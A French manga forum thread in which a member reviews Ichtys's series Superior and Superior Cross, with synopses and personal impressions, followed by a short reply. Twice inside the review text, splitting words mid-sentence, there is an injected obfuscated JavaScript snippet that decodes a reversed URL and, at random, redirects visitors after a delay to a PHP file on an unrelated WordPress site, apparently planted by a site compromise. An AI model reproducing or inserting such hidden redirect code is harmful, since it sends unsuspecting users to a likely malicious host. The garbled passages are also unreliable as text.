Superior et Superior Cross

Pour discuter de manga, de bd et de comics
Répondre
Avatar du membre
yami627
Dragon d'Argent
Dragon d'Argent
Messages : 173
Enregistré le : 10 avr. 2011, 19:56

Superior et Superior Cross

Message par yami627 »

Image
Superior
Auteur: Ichtys
Genre: Aventure, fantastique
Editeur japonais: Square Enix
Editeur français : Ki-oon
volume : 9 (fini)

Synopsis :
Dans ce monde ,il est un être plus cruel que tous les autres. Sheila,le roi démons, a éradiquer de sang froid plus de la moitié de l'humanité ,et soumis tous les monstres jusqu'au dernier .Face à elle, les hommes se sont donné un héros. Exa,un homme convaincu que la coexistences est possible entre humains et démons. Il refuse donc de tuer avec une exception : le roi démons. Intriguée par ces principes atypiques, Sheila décide de se joindre à lui dans ses voyages pour l'observer. Mais, elle n'a pas l'intention de le laisser en vie ...

scan :
Image
Image
Superior Cross
Auteur: Ichtys
Genre: Aventure, fantastique
Editeur japonais: Square Enix
Editeur français : Ki-oon
volume : 6 (fini)

Synopsis :
Le Dr Altman, un médecin de génie, parvient à soigner le héros et à lui rendre l'usage de sa main. Exa et Lakshry repartent donc à l'assaut, bien décidés à libérer la ville... C'est alors que ses habitants arrivent en renfort, bientôt suivis par les troupes du roi Rubinstein ! Voilà les monstres obligés de battre en retraite.

Kagami, qui a tenté d'intervenir, se rend compte que le roi démon l'a bel et bien trahi ! Il dem$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ande à la copie de Sheila une faveur un peu particulière : éliminer sa créatrice...

scan :
Image
mon avis : j'avais acheté le tome 1 juste parce que le dessin me plaisais à la base XD mais au fur et à mesure que je découvrais l'histoire je me suis mis à adoré ce mangas ! L'histoire peut sembler basique au départ mais elle est en réalité plus complexe que ça et les personnages sont tous très attachants et on chacun leurs propres histoires (le tout étant très bien ficelés). Superior Cross est "une saison2" de Superior lol (ne me dem$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andez pas pourquoi elle a changé de nom entre temps.... je trouve ça un peu inutile XD)

enfin bref, cette série est aussi drôle que triste et l'univers dans lequel on est projeté est sublime grâce aux dessin de Ichtys.
Image
Avatar du membre
Septine Madrona
Dragon Noir
Dragon Noir
Messages : 256
Enregistré le : 23 nov. 2008, 19:34
Localisation : Libourne (33)
Contact :

Re: Superior et Superior Cross

Message par Septine Madrona »

Je connaissais seulement de nom, et il est vrai que les dessins sont magnifiques.
Image
Répondre